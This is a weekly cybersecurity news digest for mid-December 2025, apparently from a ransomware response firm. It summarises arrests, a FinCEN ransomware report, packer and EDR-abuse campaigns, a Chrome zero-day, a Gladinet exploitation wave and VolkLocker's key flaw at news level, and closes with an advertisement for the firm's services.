News Week: December 8th to December 14th, 2025

Polish authorities detain suspects over alleged cyber intrusion attempts

Polish law enforcement has detained three Ukrainian nationals suspected of preparing cyber-related offenses involving sensitive systems. The men, aged between 39 and 43, were stopped during a routine check and reportedly raised suspicion due to their behavior and unclear travel explanations. A subsequent vehicle search led to the seizure of multiple electronic devices that investigators believe could be used for unauthorized access to IT and telecommunications networks. Among the confiscated items were laptops, routers, numerous SIM cards, portable storage devices, antennas, and specialized tools such as Flipper Zero hardware and a K19 RF/GS detection device. Authorities allege the equipment could facilitate data interception, signal manipulation, or surveillance detection. Although the seized data was encrypted, specialists from Poland’s cybercrime unit managed to secure digital evidence. The suspects claimed to work in IT but allegedly avoided answering detailed questions. Prosecutors have filed charges related to computer fraud and possession of tools intended for criminal use, with the suspects held in custody pending further investigation.

FinCEN report highlights shifting ransomware trends and enforcement impact

A recent analysis from FinCEN reveals that ransomware groups extorted more than $2.1 billion between 2022 and 2024, with activity cresting in 2023 before declining the following year. Drawing on thousands of Bank Secrecy Act filings, the report links the downturn in 2024 payments to coordinated law enforcement actions against major operations such as ALPHV/BlackCat and LockBit. While total incidents dipped only slightly, ransom payments fell sharply, suggesting increased disruption of criminal infrastructure. FinCEN identified 267 ransomware families overall, though a small group dominated both volume and revenue. Akira ransomware appeared most frequently in reports, while ALPHV/BlackCat generated the highest total payouts, followed by LockBit. Other notable groups included Black Basta, Royal, BianLian, Hive, Medusa, and Phobos. Collectively, the ten most active variants accounted for the majority of reported losses, underscoring how concentrated the ransomware ecosystem remains despite fragmentation.

New packing service enables stealthier delivery of security-disabling malware

Security researchers have observed a growing number of ransomware operations relying on a packer-as-a-service platform known as Shanya to conceal malware designed to neutralize endpoint defenses. Active since late 2024, the service wraps malicious payloads in heavily obfuscated executables that evade antivirus and EDR inspection, with confirmed use across multiple regions worldwide. Sophos telemetry links Shanya to several prominent ransomware groups, including Medusa, Qilin, Crytox, and Akira, the latter appearing most frequently. The packer encrypts and compresses payloads, decrypting them only in memory and embedding them into modified system files such as shell32.dll to avoid disk-based detection. It also incorporates anti-analysis techniques that deliberately crash debuggers used by security tools. In many cases, Shanya-packed loaders are delivered via DLL side-loading and deploy kernel drivers to disable security services before ransomware execution. Beyond ransomware, researchers also identified ClickFix campaigns using Shanya to distribute CastleRAT, highlighting its broader appeal within the cybercrime ecosystem.

Initial access broker leverages trusted security software to evade detection

Researchers have identified a sophisticated campaign in which an initial access broker known as Storm-0249 abuses endpoint detection and response software to quietly prepare systems for ransomware deployment. Analysis shows the actor shifting away from large-scale phishing toward more covert techniques that blend into normal system behavior. In attacks observed by ReliaQuest, victims were manipulated via ClickFix social engineering into executing commands that retrieved malicious components directly into memory. The operation relied on SentinelOne EDR binaries, using DLL side-loading to execute attacker-controlled code from within a trusted, signed process. This allowed malware execution, system profiling, and encrypted C2 communication to appear as legitimate security activity. Standard Windows utilities were then used to collect identifiers such as MachineGuid, which ransomware groups like LockBit and ALPHV reportedly use to bind encryption keys to specific targets. By abusing trusted EDR processes, Storm-0249 largely bypasses conventional monitoring, highlighting the need for behavior-based detection and stricter controls over tools like PowerShell and curl.

U.S. charges individual over alleged support for pro-Russia cyber operations

U.S. authorities have brought charges against a Ukrainian national accused of assisting Russian-aligned hacktivist groups involved in cyberattacks against critical infrastructure worldwide. Prosecutors allege that Victoria Eduardovna Dubranova supported operations linked to NoName057(16) and CyberArmyofRussia_Reborn, groups tied to state-backed activity. According to the indictments, these collectives coordinated large-scale DDoS campaigns using custom tooling to disrupt government agencies, financial institutions, and essential services, including water systems and election-related infrastructure. Investigators say the attacks were organized with guidance and funding connected to Russian military intelligence, and relied on volunteer-driven platforms to amplify their impact. Dubranova has pleaded not guilty and is scheduled to stand trial in separate cases next year. U.S. officials emphasized that the charges underscore growing concerns over hacktivist-led DDoS activity evolving from online disruption into operations capable of causing real-world consequences, particularly when aimed at critical infrastructure sectors.

Emergency Chrome update addresses another actively exploited flaw

Google has issued an urgent security update for Chrome to remediate the eighth zero-day vulnerability exploited in real-world attacks this year. The high-severity flaw was fixed in the Stable Desktop channel across Windows, macOS, and Linux, with patched versions already available to users checking for updates. While Google has limited technical disclosure during the coordinated rollout, the issue was traced to the LibANGLE graphics component, where improper buffer handling could enable memory corruption and potential code execution. The vulnerability has since been assigned CVE-2025-14174 and was serious enough to prompt parallel patches across multiple Apple operating systems. Google noted that details remain restricted until a majority of users are protected. This latest zero-day continues a troubling trend in 2025, following earlier fixes in Chrome’s V8 engine, sandbox mechanisms, and account security logic, underscoring sustained pressure on browser security from active threat campaigns.

Active exploitation targets cryptographic weakness in enterprise file-sharing software

Threat actors are actively exploiting a newly uncovered cryptographic weakness in Gladinet CentreStack and Triofox to gain unauthorized access and ultimately achieve remote code execution on affected servers. According to Huntress researchers, the issue stems from a flawed custom AES implementation in which encryption keys and initialization vectors were hardcoded and identical across installations. By extracting these static values, attackers can decrypt or forge Access Tickets that contain sensitive data such as usernames, file paths, and credentials, allowing them to impersonate users. In observed attacks, forged tickets with non-expiring timestamps were used to retrieve configuration files, including web.config, enabling further compromise via a ViewState deserialization path. The activity has been linked to at least nine victim organizations across multiple sectors and is occurring alongside abuse of an older local file inclusion flaw, CVE-2025-30406. Gladinet has urged customers to update immediately, rotate machine keys, and review logs for known indicators tied to this exploitation campaign.

Flawed debut exposes weaknesses in new pro-Russia ransomware operation

The pro-Russia hacktivist group CyberVolk has entered the cybercrime space with a ransomware-as-a-service (RaaS) offering called VolkLocker, but early analysis shows the operation is undermined by critical cryptographic mistakes. Researchers found that the ransomware relies on a single hardcoded master key embedded directly in the binary, which is also written in plaintext to a temporary file on infected systems. This implementation error allows some victims to recover encrypted data without paying a ransom, significantly weakening VolkLocker’s effectiveness. Marketed as part of CyberVolk’s renewed push into monetized cybercrime, the RaaS targets both Windows and Linux/VMware ESXi environments and includes destructive features such as timed data wiping. However, the exposed key management flaw suggests poor operational maturity. While this weakness may aid current victims, security experts expect CyberVolk to correct the issue quickly, as such errors are often resolved once publicly disclosed within active ransomware-as-a-service ecosystems.

Conclusion

The incidents outlined above highlight how diverse and persistent today’s cyber threats have become, ranging from ransomware operations and zero-day exploitation to abuse of trusted security tools and cryptographic flaws. As attackers continue to refine their techniques, organizations face increasing risks to critical systems, sensitive data, and operational continuity. Proactive defense, rapid detection, and expert-led response are now essential components of effective cybersecurity strategy.

As ransomware and cybersecurity experts, we support organizations before, during, and after an incident with specialized services such as Ransomware Recovery Services, Ransomware Negotiation Services, and an Incident Response Retainer. If you are facing an active attack or want to strengthen your preparedness, our team can provide fast, discreet, and expert assistance tailored to your needs.